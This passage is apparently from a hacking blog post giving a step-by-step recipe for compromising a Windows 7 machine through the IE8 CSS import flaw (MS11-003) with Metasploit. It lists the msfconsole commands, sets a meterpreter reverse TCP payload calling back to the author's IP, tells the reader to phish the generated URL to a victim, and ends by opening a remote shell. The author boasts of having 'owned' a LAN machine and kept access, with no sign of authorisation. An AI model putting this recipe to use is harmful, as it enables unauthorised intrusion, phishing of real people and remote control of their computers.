Then Started to gear up with smb exploits available in MSF, but failed. Finally Internet Explorer Bug made Windows7 machine to OWN.
I owned a LAN machine with this bug and maintained access.
Exploit Details:
Windows 7 for 32-bit Systems with Internet Explorer 8 Remote Code Execution Severity:Critical
Reference: http://technet.microsoft.com/en-us/security/bulletin/ms11-003
How to Exploit:
1. Launch Metasploit
2. Update it
3. Type msfconsole
4. Search for ms11_003_ie_css_import
5. Use the exploit by choosing reverse TCP as Payload.
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > show payloads
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set LHOST [MY IP ADDRESS]
msf exploit(ms11_003_ie_css_import) > exploit
6. Share or Phish the Created URL with the Victim
7. Once the Victim opens the URL on IE8, you will get Notified
8. Check sessions -l for Succesful Session.
9. Now, use the session by >> session -i 1
10. Then type shell to see the Windows Prompt.
Cheers !!!!! Now you also OWN an Windows7 Machine
*** My setup includes BackTrack5 (Running Metasploit) and Target as Windows 7 Ultimate Edition, with IE8 Browser.
No comments:
Post a Comment